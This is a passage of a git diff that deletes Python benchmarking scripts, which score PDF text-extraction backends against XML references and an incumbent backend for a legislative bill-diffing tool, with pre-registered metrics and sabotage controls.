"B6": M.b6_parent_child(facts[p]["structure"], ref), - } - for p in PATHS - if p in facts - } - except Exception as exc: # noqa: BLE001 - entry.setdefault("errors", {})["xml"] = f"{type(exc).__name__}: {exc}" - entry["elapsed_s"] = round(time.perf_counter() - t0, 1) - rows.append(entry) - _progress(i, len(docs), key, entry) - out_path.parent.mkdir(parents=True, exist_ok=True) - out_path.write_text(json.dumps({"documents": rows}, indent=1)) - print(f"\nwrote {out_path}") - - -def _progress(i: int, n: int, key: str, entry: dict) -> None: - bits = [] - for p, r in (entry.get("vs_production") or {}).items(): - txt = "=" if r["H1_text_identical"] else "x" - bits.append(f"{p}: txt={txt} lab+{r['H2_absent_from_reference']}/-{r['H2_missed_from_reference']}") - print(f" [{i}/{n}] {key:<28} {' '.join(bits)} ({entry['elapsed_s']}s)", file=sys.stderr) - - -def score_pairs(out_path: Path, limit: int | None) -> None: - """H6 -- the canonical diff, the product's actual output.""" - pairs = corpus_pairs() - if limit: - pairs = pairs[:limit] - rows = [] - for i, pair in enumerate(pairs, 1): - bill, v1, v2, pdf1, pdf2 = pair[0], pair[1], pair[2], pair[3], pair[4] - key = f"{bill}/{v1}->{v2}" - entry: dict = {"pair": key} - canon: dict = {} - for path in PATHS: - try: - p1, _ = build_pages(path, pdf1) - p2, _ = build_pages(path, pdf2) - entry.setdefault("declined", {})[path] = [ - s for s, pg in (("v1", p1), ("v2", p2)) if _is_unnumbered_layout(pg) - ] - congress, chamber, number = bill.split("-", 2) - t1, o1 = pdf_full_text(p1) - t2, o2 = pdf_full_text(p2) - c = pdf_diff_to_canonical( - diff_pdfs(p1, p2), - bill_type=chamber, - bill_number=number, - congress=congress, - full_text={"v1": t1, "v2": t2}, - line_offsets={"v1": o1, "v2": o2}, - ) - canon[path] = {"amounts": amount_triples(c), "changes": change_signatures(c)} - except Exception as exc: # noqa: BLE001 - entry.setdefault("errors", {})[path] = f"{type(exc).__name__}: {exc}" - print(traceback.format_exc()[-800:], file=sys.stderr) - if "production" in canon: - ref = canon["production"] - entry["n_amount_entries_production"] = sum(ref["amounts"].values()) - entry["n_changes_production"] = sum(ref["changes"].values()) - entry["vs_production"] = {} - for path, c in canon.items(): - if path == "production": - continue - entry["vs_production"][path] = { - "H6_amounts_identical": c["amounts"] == ref["amounts"], - "H6_changes_identical": c["changes"] == ref["changes"], - "H6_amount_overlap": sum((c["amounts"] & ref["amounts"]).values()), - "H6_amounts_candidate": sum(c["amounts"].values()), - "H6_change_overlap": sum((c["changes"] & ref["changes"]).values()), - "H6_changes_candidate": sum(c["changes"].values()), - } - rows.append(entry) - marks = " ".join( - f"{p}: amt={'=' if r['H6_amounts_identical'] else 'x'} chg={'=' if r['H6_changes_identical'] else 'x'}" - for p, r in (entry.get("vs_production") or {}).items() - ) - print(f" [{i}/{len(pairs)}] {key:<30} {marks}", file=sys.stderr) - out_path.parent.mkdir(parents=True, exist_ok=True) - out_path.write_text(json.dumps({"pairs": rows}, indent=1)) - print(f"\nwrote {out_path}") - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument("--out", type=Path, required=True) - ap.add_argument("--pairs", action="store_true", help="score H6 over version pairs instead of documents") - ap.add_argument("--limit", type=int, default=None) - args = ap.parse_args() - if args.pairs: - score_pairs(args.out, args.limit) - else: - score_documents(args.out, args.limit) - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/score_migration.py b/docs/research/pdf-backend-bakeoff/probes/score_migration.py deleted file mode 100644 index 8e2f2751..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/score_migration.py +++ /dev/null @@ -1,224 +0,0 @@ -"""Concern A: production migration parity. The reference here IS the incumbent, by design. - -PRE-REGISTRATION-CONFIRMATORY.md, "Concern A -- production migration parity". - - A1 amount identity Counter[(old, new, kind)] equals native pypdfium2's, exactly - A2 change identity Counter[(change_type, norm(old), norm(new))] equals it, exactly - A3 amount F1 for when A1 fails - A4 full-text identity SHA-256 of pdf_full_text equals it - A5 line-number identity exact (page, line) set equals it - -Nothing here licenses an accuracy conclusion. Reproducing today's output exactly is -evidence about MIGRATION RISK; substituting it for "reads the document correctly" is the -error that produced the withdrawn headline. - -All 15 corpus pairs are always reported, in two strata. The 13 production accepts are the -migration gate. The 2 production declines are scored with the guard bypassed and reported -as unsupported-layout diagnostics -- they are not staffer-visible output and do not decide -whether a migration is safe. The 15/15 figure, if it holds, is named "backend equivalence -beyond supported production behavior", never production migration parity. - -Primary mode is `repaired`, the mode we would ship: a deterministic adapter normalizing a -known source-library quirk is part of the intended implementation, and production already -does the equivalent for the text API in normalize_raw. `strict` is reported as a diagnostic. - -SA1/SA2/SA3 are the controls. Each must FAIL its gate; a gate its own sabotage cannot fail -is void, and a candidate's pass on a void gate is not evidence of parity. - -Run: - .venv/bin/python docs/research/pdf-backend-bakeoff/probes/score_migration.py \ - --population p1 --out docs/research/pdf-backend-bakeoff/results/migration_p1.json -""" - -from __future__ import annotations - -import argparse -import hashlib -import json -import sys -import time -import traceback -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -for p in (str(PROBES), str(REPO / "src"), str(REPO)): - if p not in sys.path: - sys.path.insert(0, p) - -import confirm_sabotage as SAB # noqa: E402 -from contract import run_backend # noqa: E402 -from reconstruct import reconstruct # noqa: E402 -from score_phase2 import amount_triples, change_signatures, corpus_pairs, prf # noqa: E402 - -from deltatrack.compare.pdf import _is_unnumbered_layout # noqa: E402 -from deltatrack.diff_pdf import diff_pdfs # noqa: E402 -from deltatrack.formatters.canonical import pdf_diff_to_canonical # noqa: E402 -from deltatrack.parsers.pdf_text import pdf_full_text # noqa: E402 - -INCUMBENT = "pdfium-native" -CANDIDATES = ("pdfium-wasm", "pdfminer") -MODES = ("repaired", "strict") # repaired first: it is the primary - - -def holdout_pairs() -> list[tuple[str, int, int, Path, Path, Path, Path]]: - """The 32 consecutive-version holdout pairs named by the frozen membership. - - Same fail-loud reasoning as `score_confirmatory.p2_documents`: the holdout files are - fetched rather than committed, and skipping absent ones silently produced a zero-pair - run that still wrote a results file and exited 0. - """ - doc = json.loads((REPO / "docs/research/pdf-backend-bakeoff/results/holdout_membership.json").read_text()) - root = REPO / "docs/research/pdf-backend-bakeoff/holdout" - out, missing = [], [] - for m in doc["members"]: - vs = sorted(m["versions"], key=lambda v: v["index"]) - for a, b in zip(vs, vs[1:], strict=False): - d = root / m["bill_id"] - pa, pb = d / Path(a["pdf"]["path"]).name, d / Path(b["pdf"]["path"]).name - xa, xb = d / Path(a["xml"]["path"]).name, d / Path(b["xml"]["path"]).name - missing.extend(str(p.relative_to(root)) for p in (pa, pb, xa, xb) if not p.exists()) - out.append((m["bill_id"], a["index"], b["index"], pa, pb, xa, xb)) - if missing: - raise SystemExit( - f"{len(set(missing))} holdout files are missing, so the P2 pairs cannot be scored. " - f"Restore them first:\n" - f" .venv/bin/python docs/research/pdf-backend-bakeoff/probes/fetch_holdout.py\n" - f"first missing: {', '.join(sorted(set(missing))[:4])}" - ) - return out - - -def canonical_from_pages(pages_v1, pages_v2, bill: str) -> dict: - congress, chamber, number = bill.split("-", 2) - diff = diff_pdfs(pages_v1, pages_v2) - t1, o1 = pdf_full_text(pages_v1) - t2, o2 = pdf_full_text(pages_v2) - return pdf_diff_to_canonical( - diff, - bill_type=chamber, - bill_number=number, - congress=congress, - full_text={"v1": t1, "v2": t2}, - line_offsets={"v1": o1, "v2": o2}, - ) - - -def fingerprint(pages) -> dict: - text, _ = pdf_full_text(pages) - return { - "text_sha256": hashlib.sha256(text.encode()).hexdigest(), - "line_numbers": sorted( - (p.page_number, ln.line_number) for p in pages for ln in p.print_lines if ln.line_number is not None - ), - } - - -def score_pair(raw_v1: dict, raw_v2: dict, bill: str, mode: str, names: list[str]) -> dict: - """Everything for one pair in one mode, incumbent first so it can be the reference.""" - out: dict = {} - ref_amounts = ref_sigs = ref_fp = None - for name in names: - if name not in raw_v1 or name not in raw_v2: - continue - try: - p1, _ = reconstruct(raw_v1[name], repaired=(mode == "repaired")) - p2, _ = reconstruct(raw_v2[name], repaired=(mode == "repaired")) - declined = [s for s, pg in (("v1", p1), ("v2", p2)) if _is_unnumbered_layout(pg)] - canon = canonical_from_pages(p1, p2, bill) - amounts, sigs = amount_triples(canon), change_signatures(canon) - fp = {"v1": fingerprint(p1), "v2": fingerprint(p2)} - entry: dict = { - "production_declined": declined, - "n_amount_entries": sum(amounts.values()), - "n_changes": sum(sigs.values()), - } - if name == INCUMBENT: - ref_amounts, ref_sigs, ref_fp = amounts, sigs, fp - else: - entry["A1_amounts_identical"] = amounts == ref_amounts - entry["A2_changes_identical"] = sigs == ref_sigs - entry["A3_amount_prf"] = prf(ref_amounts, amounts) - entry["A3_change_prf"] = prf(ref_sigs, sigs) - entry["A4_text_identical"] = all(fp[s]["text_sha256"] == ref_fp[s]["text_sha256"] for s in ("v1", "v2")) - entry["A5_line_numbers_identical"] = all( - fp[s]["line_numbers"] == ref_fp[s]["line_numbers"] for s in ("v1", "v2") - ) - out[name] = entry - except Exception as exc: - out[name] = {"error": f"{type(exc).__name__}: {exc}", "traceback": traceback.format_exc()[-600:]} - return out - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument("--population", choices=("p1", "p2"), required=True) - ap.add_argument("--out", type=Path, required=True) - ap.add_argument("--limit", type=int, default=None) - args = ap.parse_args() - - pairs = corpus_pairs() if args.population == "p1" else holdout_pairs() - if args.limit: - pairs = pairs[: args.limit] - print(f"population {args.population}: {len(pairs)} consecutive pairs", file=sys.stderr) - - out: dict = { - "population": args.population, - "n_pairs": len(pairs), - "incumbent": INCUMBENT, - "candidates": list(CANDIDATES), - "primary_mode": "repaired", - "seed": SAB.SEED, - "pairs": {}, - } - args.out.parent.mkdir(parents=True, exist_ok=True) - - for i, (bill, a, b, pdf1, pdf2, _x1, _x2) in enumerate(pairs, 1): - key = f"{bill}/{a}->{b}" - t0 = time.perf_counter() - raw_v1: dict = {} - raw_v2: dict = {} - for name in (INCUMBENT,) + CANDIDATES: - try: - raw_v1[name] = run_backend(name, pdf1)[0] - raw_v2[name] = run_backend(name, pdf2)[0] - except Exception as exc: - print(f" {name} extract error: {exc}", file=sys.stderr) - - # Controls derive from the candidate, on the NEW side only: a migration gate has to - # catch a fault introduced by the replacement backend. - if "pdfium-wasm" in raw_v2: - for sid, (fn, _gate) in SAB.A_SABOTAGES.items(): - try: - raw_v1[sid] = raw_v1["pdfium-wasm"] - raw_v2[sid] = fn(raw_v2["pdfium-wasm"]) - except Exception as exc: - print(f" {sid} sabotage error: {exc}", file=sys.stderr) - - names = [INCUMBENT, *CANDIDATES, *SAB.A_SABOTAGES] - entry = {"bill": bill, "v1": a, "v2": b} - for mode in MODES: - entry[mode] = score_pair(raw_v1, raw_v2, bill, mode, names) - entry["elapsed_s"] = round(time.perf_counter() - t0, 2) - out["pairs"][key] = entry - args.out.write_text(json.dumps(out, indent=1, default=str)) - - prim = entry["repaired"] - flags = " ".join( - f"{n}:{'A1' if prim.get(n, {}).get('A1_amounts_identical') else 'a1'}" - f"{'A2' if prim.get(n, {}).get('A2_changes_identical') else 'a2'}" - for n in CANDIDATES - if n in prim - ) - dec = prim.get(INCUMBENT, {}).get("production_declined") or [] - print( - f" [{i}/{len(pairs)}] {key:<26} {entry['elapsed_s']:>6.1f}s " - f"{'DECLINED ' + '+'.join(dec) if dec else 'accepted'} {flags}", - file=sys.stderr, - ) - - print(f"wrote {args.out}", file=sys.stderr) - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/score_phase1.py b/docs/research/pdf-backend-bakeoff/probes/score_phase1.py deleted file mode 100644 index aa1e09d8..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/score_phase1.py +++ /dev/null @@ -1,425 +0,0 @@ -"""Phase 1: per-document scoring of every backend through the neutral layer (N=52). - -Implements metrics M1-M5 exactly as PRE-REGISTRATION.md defines them. Every backend is -scored on output of the ONE neutral reconstruction layer, so what is measured is -glyph-fact quality, not a library's own text assembly. - -The calibration gate (Trap 1) runs first and is reported first: PDFium's glyph facts go -through the same layer, and if the incumbent does not land near ceiling, no other number -here means anything. - -Run: - .venv/bin/python docs/research/pdf-backend-bakeoff/probes/score_phase1.py \ - --out docs/research/pdf-backend-bakeoff/results/phase1.json [--limit-docs N] -""" - -from __future__ import annotations - -import argparse -import difflib -import json -import re -import statistics -import sys -import time -import traceback -import xml.etree.ElementTree as ET -from collections import Counter -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -for p in (str(PROBES), str(REPO / "src"), str(REPO)): - if p not in sys.path: - sys.path.insert(0, p) - -from contract import ALL_BACKENDS, CP, FONT, X0, run_backend # noqa: E402 -from reconstruct import cluster_lines, reconstruct # noqa: E402 - -from deltatrack.bill_tree import extract_text_content, find_bill_bodies # noqa: E402 -from deltatrack.formatters.canonical import _pdf_tree_payload # noqa: E402 -from deltatrack.parsers.pdf_anchors import breadcrumb_for, extract_anchors # noqa: E402 -from deltatrack.parsers.pdf_text import normalize_glyphs, pdf_full_text # noqa: E402 - -_WORD = re.compile(r"\S+") - - -# ---------- M1: text recovery ------------------------------------------------ - - -def normalize_for_text_compare(text: str) -> list[str]: - """Token stream both sides are reduced to before comparison. - - Case is preserved (GPO small-caps headings carry real meaning), whitespace is - collapsed, and `normalize_glyphs` maps the typographic forms the PDF carries and the - XML does not. Everything removed here is listed as non-material in the - pre-registration, so the metric cannot be inflated by widening this function later. - """ - text = normalize_glyphs(text) - text = text.replace("­", "").replace("�", "") - return _WORD.findall(text) - - -_MIN_ANCHOR_BLOCK = 4 -# Alignment only ever trims the ends, so it only ever needs to look at the ends. A GPO -# cover page runs a few hundred tokens; these windows are an order of magnitude larger. -# Bounding them keeps `difflib`'s quadratic matcher off the 180k-token enrolled bills, -# where an unbounded call takes many minutes per document per backend. -_ALIGN_WINDOW_PDF = 4000 -_ALIGN_WINDOW_XML = 1500 -# Ceiling on the aligned candidate length for the order-sensitive cross-check. Above -# this, difflib's quadratic matcher costs more than the audit is worth. -_LCS_CROSS_CHECK_MAX = 25000 - - -def align_to_body(reference: list[str], candidate: list[str]) -> tuple[list[str], dict]: - """Trim the PDF's leading and trailing non-body matter before scoring. - - THE ALIGNMENT STEP Trap 1 demands, and it is frozen here before any challenger is - scored. A GPO PDF prints a cover page (chamber, congress, session, sponsors, referral - history, calendar number) and often a signature block; `find_bill_bodies` returns - none of that. Unaligned, those tokens are counted as PDF false positives, which is - noise on a 94-page bill (precision 0.93) and catastrophic on a 1-page stub - (precision 0.21) -- so the ranking would be driven by document length rather than by - backend quality. - - The rule trims EDGES ONLY: find the first and last matching blocks of at least - `_MIN_ANCHOR_BLOCK` tokens and keep the candidate span between them. Interior - material is untouched, so a backend that drops, duplicates or garbles body text is - still fully penalised. That asymmetry is the point -- alignment must not be able to - hide the defects the bake-off exists to find. - """ - head_sm = difflib.SequenceMatcher(a=reference[:_ALIGN_WINDOW_XML], b=candidate[:_ALIGN_WINDOW_PDF], autojunk=False) - head_blocks = [b for b in head_sm.get_matching_blocks() if b.size >= _MIN_ANCHOR_BLOCK] - start = head_blocks[0].b if head_blocks else 0 - - tail_sm = difflib.SequenceMatcher( - a=reference[-_ALIGN_WINDOW_XML:], b=candidate[-_ALIGN_WINDOW_PDF:], autojunk=False - ) - tail_blocks = [b for b in tail_sm.get_matching_blocks() if b.size >= _MIN_ANCHOR_BLOCK] - if tail_blocks: - last = tail_blocks[-1] - offset = max(0, len(candidate) - _ALIGN_WINDOW_PDF) - end = offset + last.b + last.size - else: - end = len(candidate) - - if end <= start: # degenerate; keep everything rather than invent a span - return candidate, {"aligned": False, "trimmed_head": 0, "trimmed_tail": 0} - return candidate[start:end], { - "aligned": bool(head_blocks or tail_blocks), - "trimmed_head": start, - "trimmed_tail": len(candidate) - end, - } - - -def token_f1(reference: list[str], candidate: list[str]) -> dict: - """Token-level precision/recall/F1 by MULTISET intersection. - - Tokens rather than characters: character similarity on a bill is dominated by - whitespace and flatters every backend into the high nineties. - - Multiset rather than longest-common-subsequence, for two reasons. The practical one - is cost: `difflib` is quadratic and the enrolled bills run to ~180k tokens, which is - minutes per document per backend per mode, i.e. days for the full matrix. The - principled one is that PDF-vs-XML *ordering* differences are expected by design -- - the two are different artifacts of one bill version, not two attempts at one artifact - -- so penalising reordering would measure the format gap rather than the backend. - - A multiset still penalises every defect this bake-off is looking for: a dropped - token, a duplicated token, a garbled token and a hallucinated token all move the - score. Only pure reordering is invisible, and that is deliberate. - - AMENDMENT, recorded rather than quietly applied: PRE-REGISTRATION.md specified - "token-level F1" without naming the algorithm, and the first implementation used - LCS. The switch was made after seeing the runtime, not the ranking. See - `--cross-check-lcs`, which recomputes both on documents small enough to afford it and - reports the delta, so the substitution can be audited rather than trusted. - """ - if not reference and not candidate: - return {"precision": 1.0, "recall": 1.0, "f1": 1.0, "matched": 0} - ref = Counter(reference) - cand = Counter(candidate) - matched = sum((ref & cand).values()) - precision = matched / len(candidate) if candidate else 0.0 - recall = matched / len(reference) if reference else 0.0 - f1 = 2 * precision * recall / (precision + recall) if (precision + recall) else 0.0 - return { - "precision": round(precision, 5), - "recall": round(recall, 5), - "f1": round(f1, 5), - "matched": matched, - } - - -def token_f1_lcs(reference: list[str], candidate: list[str]) -> dict: - """Order-sensitive F1, for the cross-check only. Quadratic; small documents only.""" - if not reference and not candidate: - return {"precision": 1.0, "recall": 1.0, "f1": 1.0, "matched": 0} - sm = difflib.SequenceMatcher(a=reference, b=candidate, autojunk=False) - matched = sum(block.size for block in sm.get_matching_blocks()) - precision = matched / len(candidate) if candidate else 0.0 - recall = matched / len(reference) if reference else 0.0 - f1 = 2 * precision * recall / (precision + recall) if (precision + recall) else 0.0 - return { - "precision": round(precision, 5), - "recall": round(recall, 5), - "f1": round(f1, 5), - "matched": matched, - } - - -def xml_body_tokens(xml_path: Path) -> list[str]: - root = ET.parse(xml_path).getroot() - bodies = find_bill_bodies(root) - return normalize_for_text_compare("\n".join(extract_text_content(b) for b in bodies)) - - -# ---------- M2: line-number recovery ----------------------------------------- - - -def line_number_set(pages) -> set[tuple[int, int]]: - return {(p.page_number, ln.line_number) for p in pages for ln in p.print_lines if ln.line_number is not None} - - -def line_number_scores(reference: set, candidate: set) -> dict: - if not reference: - return {"recall": None, "spurious_rate": None, "n_reference": 0} - hit = len(reference & candidate) - extra = len(candidate - reference) - return { - "recall": round(hit / len(reference), 5), - "spurious_rate": round(extra / len(reference), 5), - "n_reference": len(reference), - "n_candidate": len(candidate), - } - - -# ---------- M3 / M4: tree, conservation, breadcrumbs -------------------------- - -_AMOUNT = re.compile(r"\$[\d,]+(?:\.\d+)?") - - -def tree_scores(pages) -> dict: - """Heading-tree shape plus the ADR 0014 money-conservation invariant. - - Conservation is measured the way the corpus gate measures it for PDF: the union of - per-node `own_amounts` against the amounts present in the document's own full_text. - PDF has no independent ground truth for this, which the corpus gate documents as a - weaker carve-out; it is reported here on the same terms. - """ - anchors = extract_anchors(pages) - text, offsets = pdf_full_text(pages) - nodes = _pdf_tree_payload(tuple(anchors), offsets, text) - - flat: list[dict] = [] - stack = list(nodes) - while stack: - node = stack.pop() - flat.append(node) - stack.extend(node.get("children") or []) - - own: Counter = Counter() - for node in flat: - for amount in node.get("own_amounts") or []: - own[amount] += 1 - in_text = Counter(_AMOUNT.findall(text)) - over = sum(max(0, c - in_text.get(a, 0)) for a, c in own.items()) - dropped = sum(max(0, c - own.get(a, 0)) for a, c in in_text.items()) - - crumbs = [breadcrumb_for(a, anchors) for a in anchors] - return { - "n_anchors": len(anchors), - "n_nodes": len(flat), - "levels": dict(Counter(n.get("level") for n in flat)), - "conservation_overcount": over, - "conservation_dropped": dropped, - "conservation_holds": over == 0, - "breadcrumbs": crumbs, - } - - -def breadcrumb_agreement(reference: list, candidate: list) -> dict: - if not reference: - return {"agreement": None, "n_reference": 0} - ref = Counter(tuple(c) for c in reference) - cand = Counter(tuple(c) for c in candidate) - shared = sum((ref & cand).values()) - return { - "agreement": round(shared / sum(ref.values()), 5), - "n_reference": sum(ref.values()), - "n_candidate": sum(cand.values()), - } - - -# ---------- M5: font-role separation ----------------------------------------- - - -def font_role_scores(raw_pages) -> dict: - """Can this backend separate the margin line-number from the body by FONT? - - Scored as role separation, never name-string equality: the source-signal inventory - records bodies as `DeVinne` in bills but `NewCenturySchlbk` in enrolled, - engrossed-amendment-senate and committee prints, so a name test would be measuring - print class rather than backend capability. - - The margin glyph is identified positionally (leftmost run of digits on a line whose - reconstruction starts with a margin number), which is independent of font, so the - metric cannot be circular. - """ - separated = 0 - total = 0 - empty_font = 0 - all_glyphs = 0 - for page in raw_pages: - for row in cluster_lines(page): - ordered = sorted(row, key=lambda g: g[X0]) - all_glyphs += len(ordered) - empty_font += sum(1 for g in ordered if not g[FONT]) - digits: list = [] - for g in ordered: - if 0x30 <= g[CP] <= 0x39: - digits.append(g) - else: - break - if not digits or len(digits) > 2 or len(ordered) <= len(digits): - continue - body = ordered[len(digits) :] - body_fonts = [g[FONT] for g in body if g[CP] != 32 and g[FONT]] - margin_fonts = [g[FONT] for g in digits if g[FONT]] - if not body_fonts or not margin_fonts: - continue - total += 1 - if statistics.mode(margin_fonts) != statistics.mode(body_fonts): - separated += 1 - return { - "margin_vs_body_separation": round(separated / total, 5) if total else None, - "n_numbered_lines_scored": total, - "empty_font_name_rate": round(empty_font / all_glyphs, 5) if all_glyphs else None, - "n_glyphs": all_glyphs, - } - - -# ---------- driver ------------------------------------------------------------ - - -def corpus_documents() -> list[tuple[str, int, Path, Path]]: - """Every corpus version carrying BOTH formats, derived not enumerated (ADR 0015).""" - out = [] - for d in sorted((REPO / "tests" / "corpus").iterdir()): - if not d.is_dir(): - continue - stems: dict[int, dict[str, Path]] = {} - for f in d.iterdir(): - m = re.match(r"(\d+)_([a-z-]+)\.(pdf|xml)$", f.name) - if m: - stems.setdefault(int(m.group(1)), {})[m.group(3)] = f - for n, formats in sorted(stems.items()): - if {"pdf", "xml"} <= formats.keys(): - out.append((d.name, n, formats["pdf"], formats["xml"])) - return out - - -def score_document( - backend: str, pdf: Path, xml: Path, reference: dict | None, cross_check_lcs: bool = False -) -> dict: - t0 = time.perf_counter() - raw_pages, summary = run_backend(backend, pdf) - extract_s = time.perf_counter() - t0 - - result: dict = { - "backend": backend, - "extract_s": round(extract_s, 3), - "backend_summary": summary, - "font_role": font_role_scores(raw_pages), - } - - xml_tokens = xml_body_tokens(xml) - for mode in ("strict", "repaired"): - pages, diag = reconstruct(raw_pages, repaired=(mode == "repaired")) - tokens = normalize_for_text_compare("\n".join(p.text for p in pages)) - aligned, align_info = align_to_body(xml_tokens, tokens) - tree = tree_scores(pages) - entry = { - "reconstruction": diag, - "alignment": align_info, - "text_vs_xml": token_f1(xml_tokens, aligned), - "text_vs_xml_unaligned": token_f1(xml_tokens, tokens), - "text_vs_xml_lcs": ( - token_f1_lcs(xml_tokens, aligned) if cross_check_lcs and len(aligned) <= _LCS_CROSS_CHECK_MAX else None - ), - "line_numbers": line_number_scores( - reference[mode]["line_number_set"] if reference else line_number_set(pages), - line_number_set(pages), - ), - "tree": {k: v for k, v in tree.items() if k != "breadcrumbs"}, - "breadcrumbs": breadcrumb_agreement( - reference[mode]["breadcrumbs"] if reference else tree["breadcrumbs"], - tree["breadcrumbs"], - ), - "n_pages": len(pages), - } - result[mode] = entry - # The incumbent run also publishes the reference sets the challengers score - # against for the no-regression gates (2 and 3). - result.setdefault("_reference", {})[mode] = { - "line_number_set": line_number_set(pages), - "breadcrumbs": tree["breadcrumbs"], - } - return result - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument("--out", type=Path, required=True) - ap.add_argument("--limit-docs", type=int, default=None) - ap.add_argument("--backends", default=",".join(ALL_BACKENDS)) - ap.add_argument( - "--cross-check-lcs", - action="store_true", - help="also compute the order-sensitive LCS F1 where affordable, to audit the " - "multiset substitution recorded in token_f1's docstring", - ) - args = ap.parse_args() - - backends = args.backends.split(",") - if backends[0] != "pdfium-native": - # The incumbent must run first: it is both the calibration gate and the reference - # for the no-regression gates. - backends = ["pdfium-native"] + [b for b in backends if b != "pdfium-native"] - - docs = corpus_documents() - if args.limit_docs: - docs = docs[: args.limit_docs] - print(f"scoring {len(docs)} documents x {len(backends)} backends", file=sys.stderr) - - out: dict = {"documents": {}, "n_documents": len(docs), "backends": backends} - args.out.parent.mkdir(parents=True, exist_ok=True) - - for i, (bill, version, pdf, xml) in enumerate(docs, 1): - key = f"{bill}/{version}" - out["documents"][key] = {} - reference = None - for backend in backends: - try: - res = score_document(backend, pdf, xml, reference, args.cross_check_lcs) - if backend == "pdfium-native": - reference = res.pop("_reference") - else: - res.pop("_reference", None) - out["documents"][key][backend] = res - mark = f"f1={res['strict']['text_vs_xml']['f1']:.3f}/{res['repaired']['text_vs_xml']['f1']:.3f}" - except Exception as exc: # a crash is a gate-1 failure, recorded not hidden - out["documents"][key][backend] = { - "error": f"{type(exc).__name__}: {exc}", - "traceback": traceback.format_exc()[-1500:], - } - mark = "ERROR" - print(f" [{i}/{len(docs)}] {key:<28} {backend:<14} {mark}", file=sys.stderr) - args.out.write_text(json.dumps(out, indent=1, default=str)) - - print(f"wrote {args.out}", file=sys.stderr) - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/score_phase2.py b/docs/research/pdf-backend-bakeoff/probes/score_phase2.py deleted file mode 100644 index c912db3a..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/score_phase2.py +++ /dev/null @@ -1,329 +0,0 @@ -"""Phase 2: the terminal metric -- PDF-derived diff vs XML-derived diff (N=15 pairs). - -This is the product. A backend that wins Phase 1 and loses here loses, because the diff -is what a staffer reads. - -Both pipelines converge on the canonical JSON contract (ADR 0006), so this is a -structured comparison rather than a text one. Three families of measurement, reported -separately and never merged into one number: - - T1 change-set agreement, PDF vs XML - T2 amount_entries agreement, PDF vs XML <- the highest-consequence field - T4 backend vs incumbent, PDF side only - -T4 is an ADDITION to the spec, and it is the sharpest instrument here. T1/T2 compare two -different artifacts of one bill version, so their disagreement mixes three causes the -metric cannot separate (Trap 2). T4 holds the entire downstream pipeline fixed and varies -only the glyph source, so ANY difference is attributable to the backend with no -adjudication required. It answers the question a delivery decision actually turns on: -would swapping the PDF backend change what a staffer sees? - -Comparisons are STRUCTURE-FREE by design. PDF-vs-XML output parity is settled-impossible -(the two segment provisions differently -- blocks vs elements), so a differing `modified` -count is not a defect and is reported as context, never as an error. What is comparable -is content: the multiset of money transitions, and the bag of changed text. - -Run: - .venv/bin/python docs/research/pdf-backend-bakeoff/probes/score_phase2.py \ - --out docs/research/pdf-backend-bakeoff/results/phase2.json -""" - -from __future__ import annotations - -import argparse -import json -import re -import sys -import time -import traceback -from collections import Counter -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -for p in (str(PROBES), str(REPO / "src"), str(REPO)): - if p not in sys.path: - sys.path.insert(0, p) - -from contract import ALL_BACKENDS, run_backend # noqa: E402 -from reconstruct import reconstruct # noqa: E402 - -from deltatrack.bill_tree import normalize_bill # noqa: E402 -from deltatrack.compare.pdf import UnsupportedLayoutError, _is_unnumbered_layout # noqa: E402 -from deltatrack.diff_bill import bill_diff_to_dict, diff_bills # noqa: E402 -from deltatrack.diff_pdf import diff_pdfs # noqa: E402 -from deltatrack.formatters.canonical import ( # noqa: E402 - pdf_diff_to_canonical, - xml_diff_to_canonical, -) -from deltatrack.formatters.text_serializer import build_xml_full_text # noqa: E402 -from deltatrack.parsers.pdf_text import normalize_glyphs, pdf_full_text # noqa: E402 - -_WORD = re.compile(r"\S+") -_AMOUNT_TOKEN = re.compile(r"\$[\d,]+(?:\.\d+)?") -# Materiality floor from PRE-REGISTRATION.md clause (c). -_MATERIAL_MIN_CHARS = 20 -_SECTION_ID = re.compile(r"\b(?:SEC|SECTION|TITLE|DIVISION)\b\.?\s*[\dIVXLC]+", re.IGNORECASE) - - -def norm_text(text: str | None) -> str: - """Typographic normalization, exactly the set PRE-REGISTRATION.md declares non-material. - - Deliberately narrow. Widening it later would inflate agreement, so every rule here - corresponds to a named non-material class: whitespace runs, the glyph mappings - `normalize_glyphs` performs, soft hyphens, GPO margin line numbers, and the - letter-spacing GPO applies inside small-caps headings. - """ - if not text: - return "" - text = normalize_glyphs(text) - text = text.replace("­", "").replace("�", "") - text = re.sub(r"^\s*\d{1,2}\s", " ", text, flags=re.MULTILINE) - return " ".join(_WORD.findall(text)) - - -def prf(reference: Counter, candidate: Counter) -> dict: - matched = sum((reference & candidate).values()) - n_ref = sum(reference.values()) - n_cand = sum(candidate.values()) - precision = matched / n_cand if n_cand else (1.0 if not n_ref else 0.0) - recall = matched / n_ref if n_ref else (1.0 if not n_cand else 0.0) - f1 = 2 * precision * recall / (precision + recall) if (precision + recall) else 0.0 - return { - "precision": round(precision, 5), - "recall": round(recall, 5), - "f1": round(f1, 5), - "matched": matched, - "n_reference": n_ref, - "n_candidate": n_cand, - } - - -# ---------- structure-free views of a canonical diff -------------------------- - - -def amount_triples(canonical: dict) -> Counter: - """Multiset of (old, new, kind) money transitions across the whole diff. - - The strongest available oracle for this comparison: money is the highest-consequence - field, and a transition carries no structural coordinates, so it survives the fact - that the two pipelines segment provisions differently. - """ - out: Counter = Counter() - for change in canonical.get("changes") or []: - for entry in change.get("amount_entries") or []: - out[(entry.get("old"), entry.get("new"), entry.get("kind"))] += 1 - return out - - -def changed_text_tokens(canonical: dict) -> tuple[Counter, Counter]: - """Bag of tokens appearing on each side of every change. - - Structure-free counterpart to change matching: it asks "did the two pipelines flag - the same words as having changed", without requiring them to package those words into - the same number of changes. - """ - 